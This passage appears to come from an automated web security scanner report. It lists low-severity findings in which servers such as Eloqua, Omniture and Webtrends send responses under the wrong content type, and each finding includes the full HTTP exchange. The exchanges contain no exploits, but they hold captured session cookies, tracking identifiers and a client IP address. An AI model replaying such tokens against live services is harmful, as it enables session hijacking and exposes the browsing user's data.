28.35. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2598&ref2=http%3A//www.manutd.com/en/Club/Sponsors.aspx%3Fsponsorid%3D%7BF745DA14-CB5E-4A81-816A-8DB410E47A75%7D&tzo=360&ms=133 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/default.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:59:09 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
28.36. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://orbitz.tt.omtrdc.net
Path:   /m2/orbitz/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/orbitz/mbox/standard?mboxHost=www.orbitz.com&mboxSession=1317600406536-142286&mboxPC=1317600406536-142286.19&mboxPage=1317601629903-922630&screenHeight=1200&screenWidth=1920&browserWidth=700&browserHeight=700&browserTimeOffset=-300&colorDepth=16&mboxCount=1&numberOfNights=3&numberOfRooms=1&mbox=hotel210&mboxId=0&mboxTime=1317583632469&mboxURL=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot%26hsv.showDetails%3Dtrue%26hotel.hid%3D10417%26hotel.hkey%3D10417_null_null_null_A1%3A0&mboxReferrer=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&mboxVersion=39 HTTP/1.1
Host: orbitz.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 163
Date: Mon, 03 Oct 2011 00:27:17 GMT
Server: Test & Target

mboxFactories.get('default').get('hotel210',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317600406536-142286.19");
28.37. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/orbitzaway/mbox/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099178-690078&mboxCount=2&mbox=trip_landing_providers_onload&mboxId=0&mboxTime=1317584100695&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 184
Date: Mon, 03 Oct 2011 00:35:03 GMT
Server: Test & Target

mboxFactories.get('default').get('trip_landing_providers_onload',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");
28.38. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0558b61c652f2b13814f52bc82b50bf69393c1a457279e848b07a1911a516b3c5b0f155e1e37d4bfcdb73f22fbbae1f4546cda0e6c6cad849f36658cf9e57a4a432696b3c3ea6bb4bc7804c87b2769f9be18cfe641678e007388419565df3ed541fbf040e1243ea7b1cf12b1770a9765b3d035afc4a953e9c49fcffb4ee7f07ffa381da8257cc19b37ba80954d6b50b545851b51d5f539f94b087c22c0c948bf761f57b35ca773cc0ecbd24bd8328933244419c47e2c04e61d9c9a59d0edff3f5083f655bd39a50f71a9229608c4a6030a7bd6c85a3eab3913a8b018a1e40fd4e25fa0d462aa0b4e876271bce66ac4023f636b6df4be60cdcaf4a16c3885cfc4b2cf7189fb10bee059f17c8072ce87259a372c95c8c6327ebe3729819bd538f65667f3b2cc5b293bbd5327d81a6fad9c885e9b4c2f552631cf3c3d9c2960d1712d7166b178602db44042574d152c040a0abb1e250b0380953e9617809313292370c313124feb2707e88333355247b7c7f429dc408c78aa0af2ab6497a8e3eb43913437e61e4ecb53412470479873d95bf90e918c91f4187cd197aba019e041da665f9d807cea325fad4ee60014c2ae16df5b10a3e6456628882750e21c52fd6a5ac67b5d1f9a1418e6bf3150c694228b1c4142b1b140ef59b10596ac2e7c8167a60b0a6ed5ad65cbb114cd9cbeaccb3640d2e1fb64f90285d2134ab0cb172c984a8995e3266f65c9e18d7d0ebebcc773c073900a79a04cb1c57f1fed100becaf6238b87a2d8781e5faf057e287d12375f35e77fa52bb308884c156037cb29c52512910c138b73201938b30474970c1f5cdfde9b00a144daf61af3e781f8ab7f56fa7bf68faf2886203f57dffb0413956a0708e81111278aa747faabeca91ec1066a0a87425dc07396d4a890f7c6276cb2ee1d19cb922585a219c127a0d90a383a7a48bb7fc0aaf59234a71f0e5f327141834709424ec184818828263f8b97440a976b1ab58cdc6d3c20d372204aa7abd1c2a51d73968327c7d38475612d449ead34a40fc73ed3fe5deba445c712a3e19ee2d55dab37a1c4c1dbdb1baa8a12f97dfa439a873e62e142e1d211d714a96cf4ec40b4b26817dbbe2540e3754f9efcd728f0058103bd70793ebde0588b7d1713a73bc54db8e581de98ae5fc1071670ee3d70a36b99e11f5a322b298a1d3996a8a14d64f643cc9db1da4399601ef2f28fccdc20f98b75283a4fdc863365d50ca86d5572203a2a3f0158531b746e650a991fa2fc8907725d7d6617a8167f610b62c2a901225bcfa9e850849f71c9d24aa9f1bb07118c2d7d1fa30d2f5afa5f0a9cdbe67264c494a4eaa082ea41f12d4484f63183fe587f06a9ed1fabe7aad6483964b6ed811b02dcd33d  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0558b61c652f2b13814f52bc82b50bf69393c1a457279e848b07a1911a516b3c5b0f155e1e37d4bfcdb73f22fbbae1f4546cda0e6c6cad849f36658cf9e57a4a432696b3c3ea6bb4bc7804c87b2769f9be18cfe641678e007388419565df3ed541fbf040e1243ea7b1cf12b1770a9765b3d035afc4a953e9c49fcffb4ee7f07ffa381da8257cc19b37ba80954d6b50b545851b51d5f539f94b087c22c0c948bf761f57b35ca773cc0ecbd24bd8328933244419c47e2c04e61d9c9a59d0edff3f5083f655bd39a50f71a9229608c4a6030a7bd6c85a3eab3913a8b018a1e40fd4e25fa0d462aa0b4e876271bce66ac4023f636b6df4be60cdcaf4a16c3885cfc4b2cf7189fb10bee059f17c8072ce87259a372c95c8c6327ebe3729819bd538f65667f3b2cc5b293bbd5327d81a6fad9c885e9b4c2f552631cf3c3d9c2960d1712d7166b178602db44042574d152c040a0abb1e250b0380953e9617809313292370c313124feb2707e88333355247b7c7f429dc408c78aa0af2ab6497a8e3eb43913437e61e4ecb53412470479873d95bf90e918c91f4187cd197aba019e041da665f9d807cea325fad4ee60014c2ae16df5b10a3e6456628882750e21c52fd6a5ac67b5d1f9a1418e6bf3150c694228b1c4142b1b140ef59b10596ac2e7c8167a60b0a6ed5ad65cbb114cd9cbeaccb3640d2e1fb64f90285d2134ab0cb172c984a8995e3266f65c9e18d7d0ebebcc773c073900a79a04cb1c57f1fed100becaf6238b87a2d8781e5faf057e287d12375f35e77fa52bb308884c156037cb29c52512910c138b73201938b30474970c1f5cdfde9b00a144daf61af3e781f8ab7f56fa7bf68faf2886203f57dffb0413956a0708e81111278aa747faabeca91ec1066a0a87425dc07396d4a890f7c6276cb2ee1d19cb922585a219c127a0d90a383a7a48bb7fc0aaf59234a71f0e5f327141834709424ec184818828263f8b97440a976b1ab58cdc6d3c20d372204aa7abd1c2a51d73968327c7d38475612d449ead34a40fc73ed3fe5deba445c712a3e19ee2d55dab37a1c4c1dbdb1baa8a12f97dfa439a873e62e142e1d211d714a96cf4ec40b4b26817dbbe2540e3754f9efcd728f0058103bd70793ebde0588b7d1713a73bc54db8e581de98ae5fc1071670ee3d70a36b99e11f5a322b298a1d3996a8a14d64f643cc9db1da4399601ef2f28fccdc20f98b75283a4fdc863365d50ca86d5572203a2a3f0158531b746e650a991fa2fc8907725d7d6617a8167f610b62c2a901225bcfa9e850849f71c9d24aa9f1bb07118c2d7d1fa30d2f5afa5f0a9cdbe67264c494a4eaa082ea41f12d4484f63183fe587f06a9ed1fabe7aad6483964b6ed811b02dcd33d

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0558b61c652f2b13814f52bc82b50bf69393c1a457279e848b07a1911a516b3c5b0f155e1e37d4bfcdb73f22fbbae1f4546cda0e6c6cad849f36658cf9e57a4a432696b3c3ea6bb4bc7804c87b2769f9be18cfe641678e007388419565df3ed541fbf040e1243ea7b1cf12b1770a9765b3d035afc4a953e9c49fcffb4ee7f07ffa381da8257cc19b37ba80954d6b50b545851b51d5f539f94b087c22c0c948bf761f57b35ca773cc0ecbd24bd8328933244419c47e2c04e61d9c9a59d0edff3f5083f655bd39a50f71a9229608c4a6030a7bd6c85a3eab3913a8b018a1e40fd4e25fa0d462aa0b4e876271bce66ac4023f636b6df4be60cdcaf4a16c3885cfc4b2cf7189fb10bee059f17c8072ce87259a372c95c8c6327ebe3729819bd538f65667f3b2cc5b293bbd5327d81a6fad9c885e9b4c2f552631cf3c3d9c2960d1712d7166b178602db44042574d152c040a0abb1e250b0380953e9617809313292370c313124feb2707e88333355247b7c7f429dc408c78aa0af2ab6497a8e3eb43913437e61e4ecb53412470479873d95bf90e918c91f4187cd197aba019e041da665f9d807cea325fad4ee60014c2ae16df5b10a3e6456628882750e21c52fd6a5ac67b5d1f9a1418e6bf3150c694228b1c4142b1b140ef59b10596ac2e7c8167a60b0a6ed5ad65cbb114cd9cbeaccb3640d2e1fb64f90285d2134ab0cb172c984a8995e3266f65c9e18d7d0ebebcc773c073900a79a04cb1c57f1fed100becaf6238b87a2d8781e5faf057e287d12375f35e77fa52bb308884c156037cb29c52512910c138b73201938b30474970c1f5cdfde9b00a144daf61af3e781f8ab7f56fa7bf68faf2886203f57dffb0413956a0708e81111278aa747faabeca91ec1066a0a87425dc07396d4a890f7c6276cb2ee1d19cb922585a219c127a0d90a383a7a48bb7fc0aaf59234a71f0e5f327141834709424ec184818828263f8b97440a976b1ab58cdc6d3c20d372204aa7abd1c2a51d73968327c7d38475612d449ead34a40fc73ed3fe5deba445c712a3e19ee2d55dab37a1c4c1dbdb1baa8a12f97dfa439a873e62e142e1d211d714a96cf4ec40b4b26817dbbe2540e3754f9efcd728f0058103bd70793ebde0588b7d1713a73bc54db8e581de98ae5fc1071670ee3d70a36b99e11f5a322b298a1d3996a8a14d64f643cc9db1da4399601ef2f28fccdc20f98b75283a4fdc863365d50ca86d5572203a2a3f0158531b746e650a991fa2fc8907725d7d6617a8167f610b62c2a901225bcfa9e850849f71c9d24aa9f1bb07118c2d7d1fa30d2f5afa5f0a9cdbe67264c494a4eaa082ea41f12d4484f63183fe587f06a9ed1fabe7aad6483964b6ed811b02dcd33d HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6FBCA80F75E0528A929525FF0B85D1D0; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=e1f36dbd085f0041d284; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=E7131C81E64A38E81B17329B424FCCDB; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; Expires=Sun, 01-Jan-2012 00:03:13 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=019dddd1; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93204194090; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.39. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b34e13fc5045e2d98a069be11f8167050f8807b19d0c3f89cee5920595b5c06102533ba2e325817ebf4032d6106530f3b97c92b4f6e3e4359612ac322af65b42af52007fe3a2ae2e1a65aa10c520449f40a0b27eb0418a84600ec28c7be9662afd0584e35d9373f46daf655c8f115cc82f8c09cd39719abb36dc59c00fc279633b734891ffc4ebc13d6bc2e2bb92db9dfed8a8ae163e4de1dbd7d1cb554051a04b2a47dd17d2484164308345d55bcfc7d88a31c02b0444b93c621d2543fc71496b653ffda87966973320483e11103901c3881bce99a6b422be5f73883eb43913437e61e4ecb5341e5a1517ef7dd8ebcbf314c51f4187cd197aba019e1c1da665f9d80ed3a322e1dce4690e4f3de97bfca95d662b6a4e8fd4344f5c8879c9e4ef2b9efce3b901c370fc01046a077adfc21053525c5abafb4e000898f7cc495851aca6fb5aec12f60e4c8397fbdbba3b422e12b54a9834487952ac58c03bd8dbb5e2577005b409d849a2a4b3acce676f013e5df2cf539b1f07f6aed85dbcc4ad228f8cf28a7f440da651282427493b5837e322f47dbd598911423263c926c92318c00815dd25724b35ef037392091c5d88da9a57a412d1f74da3b580f6fd7c5dab2ca7dafb2d87223056daf90f1992685708e716157b88f514acfcecaf49c4003d0b82115796769084acc7abc6276fbee3484b9cc674d5ab4cc623f08a5d68392f40be29c2faa7d320b0793862444364c04b1e1312d4ccc7b16a627285c944098f6b1be3d9837734338673704af4ff8695b70964afc463dd8f8f233c34518bba5dea59d369c5aa49f5a5189040aafb91a68054aa3ea49691de9f56bab651b864e900cbcc726cbb15e1880bdb54fe6fa6be44e5e4641388b87511e0744b99ff812fa7508002ec727d6cbae0588d2c1612f43a951de3e58281c5fb5e91074126ea6a75a16cc8e24807672a29d5193bc8a8f44433f6119ecab6d81398371ef5a3d79cdf21fad6702b3a498e813965d00ef3625272753729385f0c0f18246e30049e1af2a880017759733244a9107a360a6997f7072a5ecda6ef00d791239f854af9aabf004cd52a781af35d7757a05b0f92dbe77930c396a7eaa1dfb343f32e44d6a16584af5b2a51a6bd17a9bafe871c6136a7f3cd5f9f5613fc69da81484206e5b368845d9caf38b88884a5df0a10b193cc028f0591  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b34e13fc5045e2d98a069be11f8167050f8807b19d0c3f89cee5920595b5c06102533ba2e325817ebf4032d6106530f3b97c92b4f6e3e4359612ac322af65b42af52007fe3a2ae2e1a65aa10c520449f40a0b27eb0418a84600ec28c7be9662afd0584e35d9373f46daf655c8f115cc82f8c09cd39719abb36dc59c00fc279633b734891ffc4ebc13d6bc2e2bb92db9dfed8a8ae163e4de1dbd7d1cb554051a04b2a47dd17d2484164308345d55bcfc7d88a31c02b0444b93c621d2543fc71496b653ffda87966973320483e11103901c3881bce99a6b422be5f73883eb43913437e61e4ecb5341e5a1517ef7dd8ebcbf314c51f4187cd197aba019e1c1da665f9d80ed3a322e1dce4690e4f3de97bfca95d662b6a4e8fd4344f5c8879c9e4ef2b9efce3b901c370fc01046a077adfc21053525c5abafb4e000898f7cc495851aca6fb5aec12f60e4c8397fbdbba3b422e12b54a9834487952ac58c03bd8dbb5e2577005b409d849a2a4b3acce676f013e5df2cf539b1f07f6aed85dbcc4ad228f8cf28a7f440da651282427493b5837e322f47dbd598911423263c926c92318c00815dd25724b35ef037392091c5d88da9a57a412d1f74da3b580f6fd7c5dab2ca7dafb2d87223056daf90f1992685708e716157b88f514acfcecaf49c4003d0b82115796769084acc7abc6276fbee3484b9cc674d5ab4cc623f08a5d68392f40be29c2faa7d320b0793862444364c04b1e1312d4ccc7b16a627285c944098f6b1be3d9837734338673704af4ff8695b70964afc463dd8f8f233c34518bba5dea59d369c5aa49f5a5189040aafb91a68054aa3ea49691de9f56bab651b864e900cbcc726cbb15e1880bdb54fe6fa6be44e5e4641388b87511e0744b99ff812fa7508002ec727d6cbae0588d2c1612f43a951de3e58281c5fb5e91074126ea6a75a16cc8e24807672a29d5193bc8a8f44433f6119ecab6d81398371ef5a3d79cdf21fad6702b3a498e813965d00ef3625272753729385f0c0f18246e30049e1af2a880017759733244a9107a360a6997f7072a5ecda6ef00d791239f854af9aabf004cd52a781af35d7757a05b0f92dbe77930c396a7eaa1dfb343f32e44d6a16584af5b2a51a6bd17a9bafe871c6136a7f3cd5f9f5613fc69da81484206e5b368845d9caf38b88884a5df0a10b193cc028f0591

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b34e13fc5045e2d98a069be11f8167050f8807b19d0c3f89cee5920595b5c06102533ba2e325817ebf4032d6106530f3b97c92b4f6e3e4359612ac322af65b42af52007fe3a2ae2e1a65aa10c520449f40a0b27eb0418a84600ec28c7be9662afd0584e35d9373f46daf655c8f115cc82f8c09cd39719abb36dc59c00fc279633b734891ffc4ebc13d6bc2e2bb92db9dfed8a8ae163e4de1dbd7d1cb554051a04b2a47dd17d2484164308345d55bcfc7d88a31c02b0444b93c621d2543fc71496b653ffda87966973320483e11103901c3881bce99a6b422be5f73883eb43913437e61e4ecb5341e5a1517ef7dd8ebcbf314c51f4187cd197aba019e1c1da665f9d80ed3a322e1dce4690e4f3de97bfca95d662b6a4e8fd4344f5c8879c9e4ef2b9efce3b901c370fc01046a077adfc21053525c5abafb4e000898f7cc495851aca6fb5aec12f60e4c8397fbdbba3b422e12b54a9834487952ac58c03bd8dbb5e2577005b409d849a2a4b3acce676f013e5df2cf539b1f07f6aed85dbcc4ad228f8cf28a7f440da651282427493b5837e322f47dbd598911423263c926c92318c00815dd25724b35ef037392091c5d88da9a57a412d1f74da3b580f6fd7c5dab2ca7dafb2d87223056daf90f1992685708e716157b88f514acfcecaf49c4003d0b82115796769084acc7abc6276fbee3484b9cc674d5ab4cc623f08a5d68392f40be29c2faa7d320b0793862444364c04b1e1312d4ccc7b16a627285c944098f6b1be3d9837734338673704af4ff8695b70964afc463dd8f8f233c34518bba5dea59d369c5aa49f5a5189040aafb91a68054aa3ea49691de9f56bab651b864e900cbcc726cbb15e1880bdb54fe6fa6be44e5e4641388b87511e0744b99ff812fa7508002ec727d6cbae0588d2c1612f43a951de3e58281c5fb5e91074126ea6a75a16cc8e24807672a29d5193bc8a8f44433f6119ecab6d81398371ef5a3d79cdf21fad6702b3a498e813965d00ef3625272753729385f0c0f18246e30049e1af2a880017759733244a9107a360a6997f7072a5ecda6ef00d791239f854af9aabf004cd52a781af35d7757a05b0f92dbe77930c396a7eaa1dfb343f32e44d6a16584af5b2a51a6bd17a9bafe871c6136a7f3cd5f9f5613fc69da81484206e5b368845d9caf38b88884a5df0a10b193cc028f0591 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
